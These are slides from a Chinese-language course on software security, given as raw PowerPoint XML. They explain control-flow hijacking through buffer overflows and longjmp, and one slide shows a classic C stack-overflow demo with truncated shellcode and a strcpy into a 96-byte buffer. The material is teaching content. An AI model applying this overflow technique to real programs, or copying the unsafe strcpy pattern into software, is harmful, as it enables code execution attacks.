          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>longjmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）进行程序跳转</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制流程转移方法</a:t>
            </a:r>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6A9436C-6A00-4E51-B600-33B77F805564}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>233</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在缓冲区中植入攻击代码和激活记录（修改返回地址以指向攻击代码）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也可通过溢出两个缓冲区来完成。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>综合代码植入和流程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324"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C8937939-ECFE-4F3A-8B2D-D5DE425A3D06}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>234</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2483768" y="3068960"/>
            <a:ext cx="3505200" cy="3022600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>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a:xfrm>
            <a:off x="6705600" y="6248400"/>
            <a:ext cx="1905000" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C12DE5EA-BEED-4AEF-8FA3-E870D67808B8}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>235</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="980728"/>
            <a:ext cx="7924800" cy="4679950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>char shellcode[] = “\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>\x1f\x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>[128];//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>溢出串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, char **</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    char buffer[96];//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>目标缓冲区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </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long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = (long *) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> &lt; 32; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>++) //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>先写满地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>        *(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>long_ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) = (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>)buffer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> &lt; (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(shellcode); </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>] = shellcode[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>];//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>植入代码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buffer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>溢出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272388" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="2749550"/>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389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302375" y="3168650"/>
            <a:ext cx="1600200" cy="16938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Buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800"/>
              <a:t>(96bytes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272390" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302375" y="4862513"/>
            <a:ext cx="1600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i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272391" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6302375" y="5319713"/>
            <a:ext cx="1600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long_ptr</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272392" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8323263" y="2154238"/>
            <a:ext cx="11112" cy="36337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393" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7902575" y="177323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高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272394" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7902575" y="5788025"/>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低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272395" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="2327275"/>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Para2 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272396" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="1906588"/>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Para1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="272397" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="2332038"/>
            <a:ext cx="1600200" cy="2527300"/>
            <a:chOff x="2493" y="1133"/>
            <a:chExt cx="1008" cy="1592"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272398" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="2459"/>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399" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="2194"/>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0" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1929"/>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1" name="Rectangle 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1663"/>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2402" name="Rectangle 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1398"/>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3" name="Rectangle 19"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2493" y="1133"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272404" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299200" y="4025900"/>
            <a:ext cx="1600200" cy="828675"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="272405" name="Group 21"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6037263" y="3001963"/>
            <a:ext cx="263525" cy="1843087"/>
            <a:chOff x="3666" y="1671"/>
            <a:chExt cx="166" cy="1161"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="272406" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3678" y="1671"/>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7" name="Line 23"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3666" y="1671"/>
              <a:ext cx="0" cy="115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8" name="Line 24"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3669" y="2832"/>
              <a:ext cx="163"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2410" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>栈溢出攻击示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="圆角矩形标注 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35496" y="5859462"/>
            <a:ext cx="8010847" cy="968375"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -16506"/>
              <a:gd name="adj2" fmla="val -6610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lIns="0" rIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>不能精确定位返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
